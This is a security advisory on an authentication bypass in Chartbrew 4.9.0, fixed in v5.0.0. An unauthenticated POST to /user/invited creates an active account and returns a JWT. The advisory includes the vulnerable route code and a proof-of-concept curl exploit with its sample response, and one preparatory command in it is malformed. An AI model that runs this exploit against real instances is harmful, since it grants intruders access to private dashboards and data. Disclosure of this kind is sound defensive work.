# Unauthorized Account Registration Vulnerability Summary for Chartbrew

## Vulnerability Overview

The `POST /user/invited` endpoint in Chartbrew does not validate invitation tokens, authentication headers, or sessions. Any unauthorized attacker can directly call this endpoint to create a fully active account and receive a valid JWT, even if the instance has existing users and the `signupRestricted` restriction enabled.

## Impact Scope

- **Affected Versions**: 4.9.0 (latest version)
- **Fixed Version**: v5.0.0
- **Severity**: CVSS v3 Base Score 6.5/10
- **Attack Vector**: Network
- **Attack Complexity**: Low
- **Privileges Required**: None
- **User Interaction**: None
- **Scope**: Unchanged
- **Confidentiality**: Low
- **Integrity**: Low
- **Availability**: None

## Remediation

Upgrade to version v5.0.0.

## POC Code

### Vulnerable Endpoint Code (server/api/UserRoute.js:112)

```javascript
// No middleware, no token validation
app.post("/user/invited", (req, res) => {
  if (!req.body.email || !req.body.password) return res.status(400).send("no email or password");

  const userObj = {
    email: req.body.email,
    password: req.body.password,
    name: req.body.name,
    active: true, // -- immediately active, no verification
  };

  return userController.createUser(userObj)
    .then((newUser) => {
      return tokenHandler(newUser, res); // -- JWT returned immediately
    });
});
```

### Protected Endpoint Code (Comparison)

```javascript
app.post("/user", async (req, res) => {
  if (app.settings.signupRestricted == "1") { // -- enforced here
    const areThereAnyUsers = await userController.areThereAnyUsers();
    if (areThereAnyUsers) return res.status(401).send("Signups are restricted");
  }
  // active: false -- requires verification
});
```

### Exploitation Code

```bash
# Instance already has users -- signupRestricted should apply
curl http://localhost:4019/api/users \
  -H "areThereAnyUsers": true

# Attack (1 request without credentials):
curl -i -X POST http://TARGET/user/invited \
  -H "Content-Type: application/json" \
  -d '{
    "name": "Attacker",
    "email": "attacker@evil.com",
    "password": "Test1234!"
  }'
```

### Response (HTTP 200)

```json
{
  "id": 4,
  "email": "attacker@evil.com",
  "name": "Attacker",
  "active": true,
  "token": "eyJhbGciOiJ9IzI1NiIsInR5cCI6IkpXVCJ9..."
}
```

## Impact

An unauthorized remote attacker can:

1. Create accounts on any Chartbrew instance, regardless of the `signupRestricted` configuration.
2. Receive a valid 30-day JWT immediately after registration.
3. Access all authenticated API endpoints as a legitimate user, including creating teams, projects, and data connections.
4. Enumerate and interact with shared/public dashboards that are visible to authenticated users but not to the public.

This vulnerability is particularly severe on instances where `signupRestricted = "1"` is intentionally set to prevent unauthorized access, as the protection is completely bypassed.